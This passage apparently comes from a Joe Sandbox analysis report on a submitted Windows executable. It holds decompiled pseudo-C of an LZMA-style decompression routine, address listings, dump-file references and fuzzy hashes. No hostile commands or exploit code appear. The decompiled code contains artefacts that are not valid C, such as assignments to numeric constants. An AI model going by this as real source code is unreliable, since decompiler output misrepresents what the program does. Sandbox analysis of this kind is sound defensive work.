                                  								0x800 = 0x800 - __edi;
                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  								__ebx = __ebx + __ebx;
                                  								 *__esi = __cx;
                                  							}
                                  							__eflags = _v20 - 0x1000000;
                                  							_v72 = __ebx;
                                  							if(_v20 >= 0x1000000) {
                                  								goto L62;
                                  							} else {
                                  								goto L60;
                                  							}
                                  						case 0x10:
                                  							L112:
                                  							__eflags = _v112;
                                  							if(_v112 == 0) {
                                  								_v140 = 0x10;
                                  								goto L173;
                                  							}
                                  							__ecx = _v116;
                                  							__eax = _v16;
                                  							_v20 = _v20 << 8;
                                  							__ecx =  *_v116 & 0x000000ff;
                                  							_v112 = _v112 - 1;
                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                  							_t371 =  &_v116;
                                  							 *_t371 = _v116 + 1;
                                  							__eflags =  *_t371;
                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                  							goto L114;
                                  						case 0x11:
                                  							L71:
                                  							__esi = _v92;
                                  							_v136 = 0x12;
                                  							goto L135;
                                  						case 0x12:
                                  							__eflags = _v68;
                                  							if(_v68 != 0) {
                                  								__eax = _v92;
                                  								_v136 = 0x13;
                                  								__esi = _v92 + 2;
                                  								L135:
                                  								_v88 = _t626;
                                  								goto L136;
                                  							}
                                  							__eax = _v80;
                                  							_v52 = _v52 & 0x00000000;
                                  							__ecx = _v92;
                                  							__eax = _v80 << 4;
                                  							__eflags = __eax;
                                  							__eax = _v92 + __eax + 4;
                                  							goto L133;
                                  						case 0x13:
                                  							__eflags = _v68;
                                  							if(_v68 != 0) {
                                  								_t475 =  &_v92;
                                  								 *_t475 = _v92 + 0x204;
                                  								__eflags =  *_t475;
                                  								_v52 = 0x10;
                                  								_v68 = 8;
                                  								L147:
                                  								_v128 = 0x14;
                                  								goto L148;
                                  							}
                                  							__eax = _v80;
                                  							__ecx = _v92;
                                  							__eax = _v80 << 4;
                                  							_v52 = 8;
                                  							__eax = _v92 + (_v80 << 4) + 0x104;
                                  							L133:
                                  							_v92 = __eax;
                                  							_v68 = 3;
                                  							goto L147;
                                  						case 0x14:
                                  							_v52 = _v52 + __ebx;
                                  							__eax = _v132;
                                  							goto L143;
                                  						case 0x15:
                                  							__eax = 0;
                                  							__eflags = _v60 - 7;
                                  							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                  							__al = __al & 0x000000fd;
                                  							__eax = (__eflags >= 0) - 1 + 0xb;
                                  							_v60 = (__eflags >= 0) - 1 + 0xb;
                                  							goto L123;
                                  						case 0x16:
                                  							__eax = _v52;
                                  							__eflags = __eax - 4;
                                  							if(__eax >= 4) {
                                  								_push(3);
                                  								_pop(__eax);
                                  							}
                                  							__ecx = _v8;
                                  							_v68 = 6;
                                  							__eax = __eax << 7;
                                  							_v128 = 0x19;
                                  							_v92 = __eax;
                                  							goto L148;
                                  						case 0x17:
                                  							L148:
                                  							__eax = _v68;
                                  							_v84 = 1;
                                  							_v76 = _v68;
                                  							goto L152;
                                  						case 0x18:
                                  							L149:
                                  							__eflags = _v112;
                                  							if(_v112 == 0) {
                                  								_v140 = 0x18;
                                  								goto L173;
                                  							}
                                  							__ecx = _v116;
                                  							__eax = _v16;
                                  							_v20 = _v20 << 8;
                                  							__ecx =  *_v116 & 0x000000ff;
                                  							_v112 = _v112 - 1;
                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                  							_t490 =  &_v116;
                                  							 *_t490 = _v116 + 1;
                                  							__eflags =  *_t490;
                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                  							L151:
                                  							_t493 =  &_v76;
                                  							 *_t493 = _v76 - 1;
                                  							__eflags =  *_t493;
                                  							L152:
                                  							__eflags = _v76;
                                  							if(_v76 <= 0) {
                                  								__ecx = _v68;
                                  								__ebx = _v84;
                                  								0 = 1;
                                  								__eax = 1 << __cl;
                                  								__ebx = _v84 - (1 << __cl);
                                  								__eax = _v128;
                                  								_v72 = __ebx;
                                  								L143:
                                  								_v140 = _t561;
                                  								goto L3;
                                  							}
                                  							__eax = _v84;
                                  							_v20 = _v20 >> 0xb;
                                  							__edx = _v84 + _v84;
                                  							__eax = _v92;
                                  							__esi = __edx + __eax;
                                  							_v88 = __esi;
                                  							__ax =  *__esi;
                                  							__edi = __ax & 0x0000ffff;
                                  							__ecx = (_v20 >> 0xb) * __edi;
                                  							__eflags = _v16 - __ecx;
                                  							if(_v16 >= __ecx) {
                                  								_v20 = _v20 - __ecx;
                                  								_v16 = _v16 - __ecx;
                                  								__cx = __ax;
                                  								__cx = __ax >> 5;
                                  								__eax = __eax - __ecx;
                                  								__edx = __edx + 1;
                                  								__eflags = __edx;
                                  								 *__esi = __ax;
                                  								_v84 = __edx;
                                  							} else {
                                  								_v20 = __ecx;
                                  								0x800 = 0x800 - __edi;
                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  								_v84 = _v84 << 1;
                                  								 *__esi = __cx;
                                  							}
                                  							__eflags = _v20 - 0x1000000;
                                  							if(_v20 >= 0x1000000) {
                                  								goto L151;
                                  							} else {
                                  								goto L149;
                                  							}
                                  						case 0x19:
                                  							__eflags = __ebx - 4;
                                  							if(__ebx < 4) {
                                  								_v48 = __ebx;
                                  								L122:
                                  								_t399 =  &_v48;
                                  								 *_t399 = _v48 + 1;
                                  								__eflags =  *_t399;
                                  								L123:
                                  								__eax = _v48;
                                  								__eflags = __eax;
                                  								if(__eax == 0) {
                                  									_v52 = _v52 | 0xffffffff;
                                  									goto L173;
                                  								}
                                  								__eflags = __eax - _v100;
                                  								if(__eax > _v100) {
                                  									goto L174;
                                  								}
                                  								_v52 = _v52 + 2;
                                  								__eax = _v52;
                                  								_t406 =  &_v100;
                                  								 *_t406 = _v100 + _v52;
                                  								__eflags =  *_t406;
                                  								goto L126;
                                  							}
                                  							__ecx = __ebx;
                                  							__eax = __ebx;
                                  							__ecx = __ebx >> 1;
                                  							__eax = __ebx & 0x00000001;
                                  							__ecx = (__ebx >> 1) - 1;
                                  							__al = __al | 0x00000002;
                                  							__eax = (__ebx & 0x00000001) << __cl;
                                  							__eflags = __ebx - 0xe;
                                  							_v48 = __eax;
                                  							if(__ebx >= 0xe) {
                                  								__ebx = 0;
                                  								_v76 = __ecx;
                                  								L105:
                                  								__eflags = _v76;
                                  								if(_v76 <= 0) {
                                  									__eax = __eax + __ebx;
                                  									_v68 = 4;
                                  									_v48 = __eax;
                                  									__eax = _v8;
                                  									__eax = _v8 + 0x644;
                                  									__eflags = __eax;
                                  									L111:
                                  									__ebx = 0;
                                  									_v92 = __eax;
                                  									_v84 = 1;
                                  									_v72 = 0;
                                  									_v76 = 0;
                                  									L115:
                                  									__eax = _v68;
                                  									__eflags = _v76 - _v68;
                                  									if(_v76 >= _v68) {
                                  										_t397 =  &_v48;
                                  										 *_t397 = _v48 + __ebx;
                                  										__eflags =  *_t397;
                                  										goto L122;
                                  									}
                                  									__eax = _v84;
                                  									_v20 = _v20 >> 0xb;
                                  									__edi = _v84 + _v84;
                                  									__eax = _v92;
                                  									__esi = __edi + __eax;
                                  									_v88 = __esi;
                                  									__ax =  *__esi;
                                  									__ecx = __ax & 0x0000ffff;
                                  									__edx = (_v20 >> 0xb) * __ecx;
                                  									__eflags = _v16 - __edx;
                                  									if(_v16 >= __edx) {
                                  										__ecx = 0;
                                  										_v20 = _v20 - __edx;
                                  										__ecx = 1;
                                  										_v16 = _v16 - __edx;
                                  										__ebx = 1;
                                  										__ecx = _v76;
                                  										__ebx = 1 << __cl;
                                  										__ecx = 1 << __cl;
                                  										__ebx = _v72;
                                  										__ebx = _v72 | __ecx;
                                  										__cx = __ax;
                                  										__cx = __ax >> 5;
                                  										__eax = __eax - __ecx;
                                  										__edi = __edi + 1;
                                  										__eflags = __edi;
                                  										_v72 = __ebx;
                                  										 *__esi = __ax;
                                  										_v84 = __edi;
                                  									} else {
                                  										_v20 = __edx;
                                  										0x800 = 0x800 - __ecx;
                                  										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                  										_v84 = _v84 << 1;
                                  										 *__esi = __dx;
                                  									}
                                  									__eflags = _v20 - 0x1000000;
                                  									if(_v20 >= 0x1000000) {
                                  										L114:
                                  										_t374 =  &_v76;
                                  										 *_t374 = _v76 + 1;
                                  										__eflags =  *_t374;
                                  										goto L115;
                                  									} else {
                                  										goto L112;
                                  									}
                                  								}
                                  								__ecx = _v16;
                                  								__ebx = __ebx + __ebx;
                                  								_v20 = _v20 >> 1;
                                  								__eflags = _v16 - _v20;
                                  								_v72 = __ebx;
                                  								if(_v16 >= _v20) {
                                  									__ecx = _v20;
                                  									_v16 = _v16 - _v20;
                                  									__ebx = __ebx | 0x00000001;
                                  									__eflags = __ebx;
                                  									_v72 = __ebx;
                                  								}
                                  								__eflags = _v20 - 0x1000000;
                                  								if(_v20 >= 0x1000000) {
                                  									L104:
                                  									_t344 =  &_v76;
                                  									 *_t344 = _v76 - 1;
                                  									__eflags =  *_t344;
                                  									goto L105;
                                  								} else {
                                  									goto L102;
                                  								}
                                  							}
                                  							__edx = _v8;
                                  							__eax = __eax - __ebx;
                                  							_v68 = __ecx;
                                  							__eax = _v8 + 0x55e + __eax * 2;
                                  							goto L111;
                                  						case 0x1a:
                                  							L58:
                                  							__eflags = _v104;
                                  							if(_v104 == 0) {
                                  								_v140 = 0x1a;
                                  								goto L173;
                                  							}
                                  							__ecx = _v108;
                                  							__al = _v96;
                                  							__edx = _v12;
                                  							_v100 = _v100 + 1;
                                  							_v108 = _v108 + 1;
                                  							_v104 = _v104 - 1;
                                  							 *_v108 = __al;
                                  							__ecx = _v24;
                                  							 *(_v12 + __ecx) = __al;
                                  							__eax = __ecx + 1;
                                  							__edx = 0;
                                  							_t197 = __eax % _v120;
                                  							__eax = __eax / _v120;
                                  							__edx = _t197;
                                  							goto L82;
                                  						case 0x1b:
                                  							L78:
                                  							__eflags = _v104;
                                  							if(_v104 == 0) {
                                  								_v140 = 0x1b;
                                  								goto L173;
                                  							}
                                  							__eax = _v24;
                                  							__eax = _v24 - _v48;
                                  							__eflags = __eax - _v120;
                                  							if(__eax >= _v120) {
                                  								__eax = __eax + _v120;
                                  								__eflags = __eax;
                                  							}
                                  							__edx = _v12;
                                  							__cl =  *(__edx + __eax);
                                  							__eax = _v24;
                                  							_v96 = __cl;
                                  							 *(__edx + __eax) = __cl;
                                  							__eax = __eax + 1;
                                  							__edx = 0;
                                  							_t280 = __eax % _v120;
                                  							__eax = __eax / _v120;
                                  							__edx = _t280;
                                  							__eax = _v108;
                                  							_v100 = _v100 + 1;
                                  							_v108 = _v108 + 1;
                                  							_t289 =  &_v104;
                                  							 *_t289 = _v104 - 1;
                                  							__eflags =  *_t289;
                                  							 *_v108 = __cl;
                                  							L82:
                                  							_v24 = __edx;
                                  							goto L83;
                                  						case 0x1c:
                                  							while(1) {
                                  								L126:
                                  								__eflags = _v104;
                                  								if(_v104 == 0) {
                                  									break;
                                  								}
                                  								__eax = _v24;
                                  								__eax = _v24 - _v48;
                                  								__eflags = __eax - _v120;
                                  								if(__eax >= _v120) {
                                  									__eax = __eax + _v120;
                                  									__eflags = __eax;
                                  								}
                                  								__edx = _v12;
                                  								__cl =  *(__edx + __eax);
                                  								__eax = _v24;
                                  								_v96 = __cl;
                                  								 *(__edx + __eax) = __cl;
                                  								__eax = __eax + 1;
                                  								__edx = 0;
                                  								_t420 = __eax % _v120;
                                  								__eax = __eax / _v120;
                                  								__edx = _t420;
                                  								__eax = _v108;
                                  								_v108 = _v108 + 1;
                                  								_v104 = _v104 - 1;
                                  								_v52 = _v52 - 1;
                                  								__eflags = _v52;
                                  								 *_v108 = __cl;
                                  								_v24 = _t420;
                                  								if(_v52 > 0) {
                                  									continue;
                                  								} else {
                                  									L83:
                                  									_v140 = 2;
                                  									goto L3;
                                  								}
                                  							}
                                  							_v140 = 0x1c;
                                  							L173:
                                  							_push(0x22);
                                  							_pop(_t574);
                                  							memcpy(_v148,  &_v140, _t574 << 2);
                                  							return 0;
                                  					}
                                  				}
                                  				L174:
                                  				_t538 = _t537 | 0xffffffff;
                                  				return _t538;
                                  			}
                                  0x0040738f
                                  0x0040738f
                                  0x00407397
                                  0x0040739c
                                  0x0040739e
                                  0x004073a1
                                  0x004073a1
                                  0x004073bc
                                  0x004073c3
                                  0x00000000
                                  0x004073c5
                                  0x00000000
                                  0x004073c5
                                  0x00000000
                                  0x00407061
                                  0x00407064
                                  0x0040709a
                                  0x004071ca
                                  0x004071ca
                                  0x004071ca
                                  0x004071ca
                                  0x004071cd
                                  0x004071cd
                                  0x004071d0
                                  0x004071d2
                                  0x0040745c
                                  0x00000000
                                  0x0040745c
                                  0x004071d8
                                  0x004071db
                                  0x00000000
                                  0x00000000
                                  0x004071e1
                                  0x004071e5
                                  0x004071e8
                                  0x004071e8
                                  0x004071e8
                                  0x00000000
                                  0x004071e8
                                  0x00407066
                                  0x00407068
                                  0x0040706a
                                  0x0040706c
                                  0x0040706f
                                  0x00407070
                                  0x00407072
                                  0x00407074
                                  0x00407077
                                  0x0040707a
                                  0x00407090
                                  0x00407095
                                  0x004070cd
                                  0x004070cd
                                  0x004070d1
                                  0x004070fd
                                  0x004070ff
                                  0x00407106
                                  0x00407109
                                  0x0040710c
                                  0x0040710c
                                  0x00407111
                                  0x00407111
                                  0x00407113
                                  0x00407116
                                  0x0040711d
                                  0x00407120
                                  0x0040714d
                                  0x0040714d
                                  0x00407150
                                  0x00407153
                                  0x004071c7
                                  0x004071c7
                                  0x004071c7
                                  0x00000000
                                  0x004071c7
                                  0x00407155
                                  0x0040715b
                                  0x0040715e
                                  0x00407161
                                  0x00407164
                                  0x00407167
                                  0x0040716a
                                  0x0040716d
                                  0x00407170
                                  0x00407173
                                  0x00407176
                                  0x0040718f
                                  0x00407191
                                  0x00407194
                                  0x00407195
                                  0x00407198
                                  0x0040719a
                                  0x0040719d
                                  0x0040719f
                                  0x004071a1
                                  0x004071a4
                                  0x004071a6
                                  0x004071a9
                                  0x004071ad
                                  0x004071af
                                  0x004071af
                                  0x004071b0
                                  0x004071b3
                                  0x004071b6
                                  0x00407178
                                  0x00407178
                                  0x00407180
                                  0x00407185
                                  0x00407187
                                  0x0040718a
                                  0x0040718a
                                  0x004071b9
                                  0x004071c0
                                  0x0040714a
                                  0x0040714a
                                  0x0040714a
                                  0x0040714a
                                  0x00000000
                                  0x004071c2
                                  0x00000000
                                  0x004071c2
                                  0x004071c0
                                  0x004070d3
                                  0x004070d6
                                  0x004070d8
                                  0x004070db
                                  0x004070de
                                  0x004070e1
                                  0x004070e3
                                  0x004070e6
                                  0x004070e9
                                  0x004070e9
                                  0x004070ec
                                  0x004070ec
                                  0x004070ef
                                  0x004070f6
                                  0x004070ca
                                  0x004070ca
                                  0x004070ca
                                  0x004070ca
                                  0x00000000
                                  0x004070f8
                                  0x00000000
                                  0x004070f8
                                  0x004070f6
                                  0x0040707c
                                  0x0040707f
                                  0x00407081
                                  0x00407084
                                  0x00000000
                                  0x00000000
                                  0x00406de3
                                  0x00406de3
                                  0x00406de7
                                  0x0040742c
                                  0x00000000
                                  0x0040742c
                                  0x00406ded
                                  0x00406df0
                                  0x00406df3
                                  0x00406df6
                                  0x00406df9
                                  0x00406dfc
                                  0x00406dff
                                  0x00406e01
                                  0x00406e04
                                  0x00406e07
                                  0x00406e0a
                                  0x00406e0c
                                  0x00406e0c
                                  0x00406e0c
                                  0x00000000
                                  0x00000000
                                  0x00406f6e
                                  0x00406f6e
                                  0x00406f72
                                  0x00407438
                                  0x00000000
                                  0x00407438
                                  0x00406f78
                                  0x00406f7b
                                  0x00406f7e
                                  0x00406f81
                                  0x00406f83
                                  0x00406f83
                                  0x00406f83
                                  0x00406f86
                                  0x00406f89
                                  0x00406f8c
                                  0x00406f8f
                                  0x00406f92
                                  0x00406f95
                                  0x00406f96
                                  0x00406f98
                                  0x00406f98
                                  0x00406f98
                                  0x00406f9b
                                  0x00406f9e
                                  0x00406fa1
                                  0x00406fa4
                                  0x00406fa4
                                  0x00406fa4
                                  0x00406fa7
                                  0x00406fa9
                                  0x00406fa9
                                  0x00000000
                                  0x00000000
                                  0x004071eb
                                  0x004071eb
                                  0x004071eb
                                  0x004071ef
                                  0x00000000
                                  0x00000000
                                  0x004071f5
                                  0x004071f8
                                  0x004071fb
                                  0x004071fe
                                  0x00407200
                                  0x00407200
                                  0x00407200
                                  0x00407203
                                  0x00407206
                                  0x00407209
                                  0x0040720c
                                  0x0040720f
                                  0x00407212
                                  0x00407213
                                  0x00407215
                                  0x00407215
                                  0x00407215
                                  0x00407218
                                  0x0040721b
                                  0x0040721e
                                  0x00407221
                                  0x00407224
                                  0x00407228
                                  0x0040722a
                                  0x0040722d
                                  0x00000000
                                  0x0040722f
                                  0x00406fac
                                  0x00406fac
                                  0x00000000
                                  0x00406fac
                                  0x0040722d
                                  0x00407462
                                  0x00407484
                                  0x0040748a
                                  0x0040748c
                                  0x00407493
                                  0x00000000
                                  0x00000000
                                  0x00406a91
                                  0x00407499
                                  0x00407499
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
                                  • Instruction ID: 0eb50412ba17cbd686f9e43e0b7d85c943a315db4d9133bb66c32ce13943f697
                                  • Opcode Fuzzy Hash: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
                                  • Instruction Fuzzy Hash: E7813471E04229DBDF24CFA9C8447ADBBB0FB44305F24816ED856BB281C7786A86DF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 98%
                                  			E00406E9D() {
                                  				signed int _t539;
                                  				unsigned short _t540;
                                  				signed int _t541;
                                  				void _t542;
                                  				signed int _t543;
                                  				signed int _t544;
                                  				signed int _t573;
                                  				signed int _t576;
                                  				signed int _t597;
                                  				signed int* _t614;
                                  				void* _t621;
                                  
                                  				L0:
                                  				while(1) {
                                  					L0:
                                  					if( *(_t621 - 0x40) != 1) {
                                  						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                  						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                  						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                  						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                  						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                  						_t539 =  *(_t621 - 4) + 0x664;
                                  						 *(_t621 - 0x58) = _t539;
                                  						goto L68;
                                  					} else {
                                  						 *(__ebp - 0x84) = 8;
                                  						while(1) {
                                  							L132:
                                  							 *(_t621 - 0x54) = _t614;
                                  							while(1) {
                                  								L133:
                                  								_t540 =  *_t614;
                                  								_t597 = _t540 & 0x0000ffff;
                                  								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                  								if( *(_t621 - 0xc) >= _t573) {
                                  									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                  									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                  									 *(_t621 - 0x40) = 1;
                                  									_t541 = _t540 - (_t540 >> 5);
                                  									 *_t614 = _t541;
                                  								} else {
                                  									 *(_t621 - 0x10) = _t573;
                                  									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                  									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                  								}
                                  								if( *(_t621 - 0x10) >= 0x1000000) {
                                  									goto L139;
                                  								}
                                  								L137:
                                  								if( *(_t621 - 0x6c) == 0) {
                                  									 *(_t621 - 0x88) = 5;
                                  									L170:
                                  									_t576 = 0x22;
                                  									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                  									_t544 = 0;
                                  									L172:
                                  									return _t544;
                                  								}
                                  								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                  								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                  								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                  								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                  								L139:
                                  								_t542 =  *(_t621 - 0x84);
                                  								while(1) {
                                  									 *(_t621 - 0x88) = _t542;
                                  									while(1) {
                                  										L1:
                                  										_t543 =  *(_t621 - 0x88);
                                  										if(_t543 > 0x1c) {
                                  											break;
                                  										}
                                  										switch( *((intOrPtr*)(_t543 * 4 +  &M004074A1))) {
                                  											case 0:
                                  												if( *(_t621 - 0x6c) == 0) {
                                  													goto L170;
                                  												}
                                  												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                  												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                  												_t543 =  *( *(_t621 - 0x70));
                                  												if(_t543 > 0xe1) {
                                  													goto L171;
                                  												}
                                  												_t547 = _t543 & 0x000000ff;
                                  												_push(0x2d);
                                  												asm("cdq");
                                  												_pop(_t578);
                                  												_push(9);
                                  												_pop(_t579);
                                  												_t617 = _t547 / _t578;
                                  												_t549 = _t547 % _t578 & 0x000000ff;
                                  												asm("cdq");
                                  												_t612 = _t549 % _t579 & 0x000000ff;
                                  												 *(_t621 - 0x3c) = _t612;
                                  												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                  												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                  												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                  												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                  													L10:
                                  													if(_t620 == 0) {
                                  														L12:
                                  														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                  														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                  														goto L15;
                                  													} else {
                                  														goto L11;
                                  													}
                                  													do {
                                  														L11:
                                  														_t620 = _t620 - 1;
                                  														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                  													} while (_t620 != 0);
                                  													goto L12;
                                  												}
                                  												if( *(_t621 - 4) != 0) {
                                  													GlobalFree( *(_t621 - 4));
                                  												}
                                  												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                  												 *(_t621 - 4) = _t543;
                                  												if(_t543 == 0) {
                                  													goto L171;
                                  												} else {
                                  													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                  													goto L10;
                                  												}
                                  											case 1:
                                  												L13:
                                  												__eflags =  *(_t621 - 0x6c);
                                  												if( *(_t621 - 0x6c) == 0) {
                                  													 *(_t621 - 0x88) = 1;
                                  													goto L170;
                                  												}
                                  												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                  												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                  												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                  												_t45 = _t621 - 0x48;
                                  												 *_t45 =  *(_t621 - 0x48) + 1;
                                  												__eflags =  *_t45;
                                  												L15:
                                  												if( *(_t621 - 0x48) < 4) {
                                  													goto L13;
                                  												}
                                  												_t555 =  *(_t621 - 0x40);
                                  												if(_t555 ==  *(_t621 - 0x74)) {
                                  													L20:
                                  													 *(_t621 - 0x48) = 5;
                                  													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                  													goto L23;
                                  												}
                                  												 *(_t621 - 0x74) = _t555;
                                  												if( *(_t621 - 8) != 0) {
                                  													GlobalFree( *(_t621 - 8)); // executed
                                  												}
                                  												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                  												 *(_t621 - 8) = _t543;
                                  												if(_t543 == 0) {
                                  													goto L171;
                                  												} else {
                                  													goto L20;
                                  												}
                                  											case 2:
                                  												L24:
                                  												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                  												 *(_t621 - 0x84) = 6;
                                  												 *(_t621 - 0x4c) = _t562;
                                  												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                  												goto L132;
                                  											case 3:
                                  												L21:
                                  												__eflags =  *(_t621 - 0x6c);
                                  												if( *(_t621 - 0x6c) == 0) {
                                  													 *(_t621 - 0x88) = 3;
                                  													goto L170;
                                  												}
                                  												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                  												_t67 = _t621 - 0x70;
                                  												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                  												__eflags =  *_t67;
                                  												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                  												L23:
                                  												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                  												if( *(_t621 - 0x48) != 0) {
                                  													goto L21;
                                  												}
                                  												goto L24;
                                  											case 4:
                                  												L133:
                                  												_t540 =  *_t614;
                                  												_t597 = _t540 & 0x0000ffff;
                                  												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                  												if( *(_t621 - 0xc) >= _t573) {
                                  													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                  													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                  													 *(_t621 - 0x40) = 1;
                                  													_t541 = _t540 - (_t540 >> 5);
                                  													 *_t614 = _t541;
                                  												} else {
                                  													 *(_t621 - 0x10) = _t573;
                                  													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                  													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                  												}
                                  												if( *(_t621 - 0x10) >= 0x1000000) {
                                  													goto L139;
                                  												}
                                  											case 5:
                                  												goto L137;
                                  											case 6:
                                  												__edx = 0;
                                  												__eflags =  *(__ebp - 0x40);
                                  												if( *(__ebp - 0x40) != 0) {
                                  													__eax =  *(__ebp - 4);
                                  													__ecx =  *(__ebp - 0x38);
                                  													 *(__ebp - 0x34) = 1;
                                  													 *(__ebp - 0x84) = 7;
                                  													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                  													L132:
                                  													 *(_t621 - 0x54) = _t614;
                                  													goto L133;
                                  												}
                                  												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                  												__esi =  *(__ebp - 0x60);
                                  												__cl = 8;
                                  												__cl = 8 -  *(__ebp - 0x3c);
                                  												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                  												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                  												__ecx =  *(__ebp - 0x3c);
                                  												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                  												__ecx =  *(__ebp - 4);
                                  												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                  												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                  												__eflags =  *(__ebp - 0x38) - 4;
                                  												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                  												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
